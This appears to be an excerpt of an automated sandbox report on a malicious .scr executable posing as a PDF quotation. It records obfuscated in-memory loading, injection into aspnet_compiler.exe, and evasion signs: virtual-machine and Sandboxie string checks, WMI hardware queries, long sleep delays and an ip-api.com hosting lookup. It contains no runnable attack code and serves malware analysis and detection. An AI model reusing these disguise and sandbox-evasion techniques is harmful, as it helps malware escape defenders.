                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, GlobalRegExporter.cs.Net Code: ViewReg
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, StrategyProperty.cs.Net Code: PopOrder System.AppDomain.Load(byte[])
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dace20.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dd4e40.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dd4e40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.80e0000.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6ec4e80.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6e24e60.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dace20.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1940288788.00000000080E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DFC970 push 8B6FA6E7h; iretd 0_2_02DFC975
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A46C4D push edi; ret 0_2_08A46C4E
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL@\
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLESELECT * FROM WIN32_COMPUTERSYSTEM
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER;SBIEDLL.DLL<SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE=VERSION>SERIALNUMBER@VMWARE|VIRTUAL|A M I|XENASELECT * FROM WIN32_COMPUTERSYSTEMBMANUFACTURERCMODELDMICROSOFT|VMWARE|VIRTUALEJOHNFANNAGXXXXXXXX
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 69D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 79D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWindow / User API: threadDelayed 7839Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWindow / User API: threadDelayed 1981Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7712Thread sleep count: 7839 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7712Thread sleep count: 1981 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99780s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99452s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99013s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98802s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97825s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96279s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96149s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95483s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99780Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99671Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99562Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99452Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99343Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99125Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99013Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98802Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98500Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98375Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98265Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98156Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98046Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97937Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97825Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97718Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97609Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97500Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97281Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97172Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97047Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96937Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96718Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96609Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96500Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96390Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96279Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96149Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 96031Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95922Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95812Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95703Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95593Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95483Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95375Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95265Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95156Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 95047Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94937Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94828Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94718Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 94609Jump to behavior
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V'q`
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1916600859.0000000001234000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q 1:en-CH:Microsoft|VMWare|Virtual
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q0VMware|VIRTUAL|A M I|Xen
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware|VIRTUAL|A M I|Xent-
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q0Microsoft|VMWare|Virtual
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware\V'q
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Microsoft|VMWare|Virtual@\
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmwareLR
                    Source: aspnet_compiler.exe, 00000006.00000002.2681887191.0000000001145000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: explorer;SbieDll.dll<select * from Win32_BIOS8Unexpected WMI query failure=version>SerialNumber@VMware|VIRTUAL|A M I|XenAselect * from Win32_ComputerSystemBmanufacturerCmodelDMicrosoft|VMWare|VirtualEjohnFannaGxxxxxxxx
                    Source: aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: VMwareVBox
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMwareLR
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWareLR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Process information queried: ProcessInformation

                    Anti Debugging
